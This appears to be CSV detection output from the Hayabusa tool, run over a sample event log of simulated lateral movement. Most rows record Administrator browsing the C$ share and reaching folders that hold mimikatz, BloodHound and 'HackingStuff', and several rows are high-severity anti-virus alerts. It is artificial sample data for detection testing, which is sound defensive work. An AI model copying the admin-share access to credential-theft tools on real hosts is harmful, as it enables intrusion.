2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff\logs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
